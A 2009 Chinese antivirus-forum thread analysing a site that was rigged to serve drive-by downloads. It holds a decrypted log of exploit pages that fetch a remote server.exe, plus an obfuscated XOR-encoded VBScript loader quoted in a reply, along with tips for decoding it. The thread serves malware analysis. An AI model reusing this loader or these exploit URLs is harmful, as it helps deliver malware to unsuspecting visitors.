查看: 1494|回复: 8
收起左侧

[已鉴定] http://p.99081.com(挂马)

[复制链接]
shadowmin
发表于 2009-6-30 16:56:49 | 显示全部楼层 |阅读模式
关于:解密的日志(全体输出 -  39):
Level  1>http://p.99081.com/ystat/h1/activxx.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/ajax.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/cx.htm
Level  1>http://p.99081.com/ystat/h1/jetaudio.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/jkx.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/lz1.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/lz2.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/mcafee.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/ms06014.htm
Level  1>http://p.99081.com/ystat/h1/ms07004.htm
Level  1>http://p.99081.com/ystat/h1/ms08053.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/office.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/opera.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/rl11.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/ruising.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/td.htm
Level  1>http://p.99081.com/ystat/h1/thunder.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/ttplayer.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/woeks.htm
Level  1>http://p.99081.com/ystat/h1/xla.htm
Level  2>http://www.wl22.com/group/images/server.exe#version=1,0,0,1
Level  1>http://p.99081.com/ystat/h1/yahoo1.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/yht.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
日志由 Redoce1.9第68次修正版于 2009-6-30 16:55:45 生成。
taoyuan237
发表于 2009-6-30 16:58:37 | 显示全部楼层
http://www.wl22.com/group/images/server.exe
貌似已经失效
myshin
发表于 2009-6-30 16:59:19 | 显示全部楼层
红伞 微点没反应~~
王子带着刀
发表于 2009-6-30 17:04:21 | 显示全部楼层
NOD32  网盾 微点 米有反应
shadowmin
 楼主| 发表于 2009-6-30 17:05:53 | 显示全部楼层

回复 2楼 taoyuan237 的帖子

这个地址是已经失效,不过这些地址的加密算是一种类型。
xiaoqiang305
发表于 2009-6-30 19:05:04 | 显示全部楼层
这是不是上次没接出来的那个类型么,怎么结出来的?
<script language=vbscript>
Function NC(x)
For i=1 to Len(x) Step 2
NC=NC & Chr(CLng("&H" & Mid(x,i,2)) Xor 26)
Next
End Function
x="267578707F796E3A79767B6969737E2738797669737E202D5F2A595E5F5F2D375E59222A372E5C292D37232E2B2A372D232A58582F5F23282D2A5F383A79757E7F787B697F2738726E6E6A2035356D6D6D346D76282834797577357D68756F6A3573777B7D7F6935497F686C7F68347F627F396C7F6869737574272B362A362A362B383A6D737E6E722738222A2A383A727F737D726E27382B232B382426357578707F796E241710"
document.write NC(x)
</script>
knifed
发表于 2009-6-30 19:48:51 | 显示全部楼层

回复 6楼 xiaoqiang305 的帖子

document.write改成alert后运行.有时会弹出代码不全.
IllusionWing
发表于 2009-6-30 19:50:21 | 显示全部楼层

回复 7楼 knifed 的帖子

因为alert函数弹出的长度有限制
xiaoqiang305
发表于 2009-6-30 20:14:25 | 显示全部楼层
ie能谈 火狐压根就不显示 我说刚才怎么改了也不显示呢
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-17 07:50 , Processed in 0.126909 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表